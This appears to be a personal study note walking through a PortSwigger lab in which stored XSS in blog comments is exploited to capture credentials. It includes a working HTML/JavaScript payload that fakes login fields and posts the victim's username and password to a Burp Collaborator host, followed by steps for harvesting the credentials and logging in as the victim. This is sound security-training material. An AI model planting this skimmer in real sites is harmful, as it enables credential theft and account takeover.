Below are precise notes demonstrating how to practically exploit a **stored Cross-Site Scripting (XSS)** vulnerability in blog comments to silently [steal usernames and passwords](https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-capturing-passwords) using **Burp Suite Collaborator**.
---
##### **Why the Vulnerability Exists (Analysis of Vulnerable Element)**
The vulnerability exists due to the blog comment functionality directly embedding user input into the HTML DOM without sufficient sanitization or encoding. Specifically, the vulnerable element:
```html
<section class="comment">
<p><!-- attacker-controlled content --></p>
</section>
```
Because the application fails to sanitize HTML/JavaScript, attackers can insert arbitrary elements like:
```html
<input>, <script>, <img>, <iframe>
```
As a result, any JavaScript event handlers (e.g., `onchange`) become executable in the victim's browser.
---
##### **Step-by-step Credential Theft Exploitation**
**1. Prepare Burp Collaborator:**
- Open **Burp Suite Professional**.
- Navigate to the **Collaborator** tab.
- Click **"Copy to clipboard"** to copy your unique subdomain (e.g., `your-subdomain.burpcollaborator.net`).
---
**2. Craft Payload to Capture Credentials:** Use this HTML/JavaScript payload to capture victim's username and password silently:
```html
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://your-subdomain.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body: username.value + ':' + this.value
});">
```
**Payload Explanation:**
- Two input fields (`username` and `password`) appear legitimate.
- When the victim enters a password (`onchange` event triggers), the script uses JavaScript's Fetch API to POST the credentials to Burp Collaborator silently (`no-cors` hides the interaction from the user).
---
**3. Deploy the Payload:**
- Submit this crafted payload in the comment form as your comment.
- Wait until the victim (simulated user) views this comment page.
---
**4. Harvesting Credentials:**
- In **Burp Collaborator**, click **"Poll now"** to retrieve interactions.
- You'll see the captured username and password in the POST request body:
```
victim_username:victim_password
```
![[CleanShot 2025-04-12 at 12.53.08.png]]
---
**5. Authenticate as Victim:**
- Use the captured credentials on the login form of the target website:
```
Username: victim_username
Password: victim_password
```
- Access victim’s account successfully, verifying exploit completion.